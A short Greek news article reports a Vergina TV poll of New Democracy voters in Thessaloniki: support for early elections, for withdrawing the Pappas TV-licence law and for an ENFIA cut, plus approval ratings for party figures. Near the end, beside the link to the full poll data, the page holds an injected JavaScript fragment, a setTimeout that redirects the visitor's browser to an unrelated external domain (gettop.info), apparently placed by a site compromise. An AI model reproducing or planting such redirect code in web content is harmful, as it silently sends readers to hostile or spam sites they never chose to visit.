Οι Θεσσαλονικείς ψηφοφόροι της ΝΔ τάσσονται κατά του νόμου Παππά

0
6

 

Δημοσκόπηση που διενεργήθηκε για λογαριασμό της «Βεργίνα Τηλεόραση» ανάμεσα σε φίλους και μέλη της ΝΔ, αναδεικνύει πως σε ποσοστό 79% οι ψηφοφόροι της ΝΔ τάσσονται υπέρ των πρόωρων εκλογών, ενώ κατά 90% αποδέχονται την πρόταση του κόμματος για την απόσυρση πρώτα του νόμου Παππά για τις τηλεοπτικές άδειες και μετά τη σύνθεση νέου ΕΣΡ.

Όσο για την πρόταση για σταδιακή μείωση του ΕΝΦΙΑ σε ποσοστό 30% μέσα στα επόμενα 2 χρόνια, στην πλειοψηφία τους (73%) οι ψηφοφόροι της ΝΔ, τη βρίσκουν απόλυτα ρεαλιστική.

Η δημοσκόπηση της εταιρείας INTERVIEW που έγινε για λογαριασμό της «Βεργίνα Τηλεόραση» σε ένα δείγμα 550 ατόμων στην Α και Β περιφέρεια Θεσσαλονίκης, αποτυπώνει τις διαθέσεις των ψηφοφόρων του κόμματος αλλά και την ουσιαστική στήριξη των επιλογών του αρχηγού της ΝΔ, Κυριάκου Μητσοτάκη.

Αυτό αναδεικνύεται και από τα υψηλά ποσοστά αποδοχής των αντιπροέδρων του κόμματος.

Ενδεικτικά, η αξιολόγηση των στελεχών της ΝΔ δίνει 82% θετική γνώμη για τον αντιπρόεδρο του κόμματος Άδωνι Γεωργιάδη, ενώ στη δεύτερη θέση έρχεται ο Κωστής Χατζηδάκης που συγκεντρώνει το 78% των θετικών γνωμών των ψηφοφόρων της ΝΔ.

Διαβάστε εδώ αναλυτικά τα στοιχεία της δημοσκόπησης: interview-%ce%b4%ce%b7%ce%bc%ce%bf%cf%83%ce%ba%cf%8c%cf%80%ce%b7%cf%83%ce%b7 setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here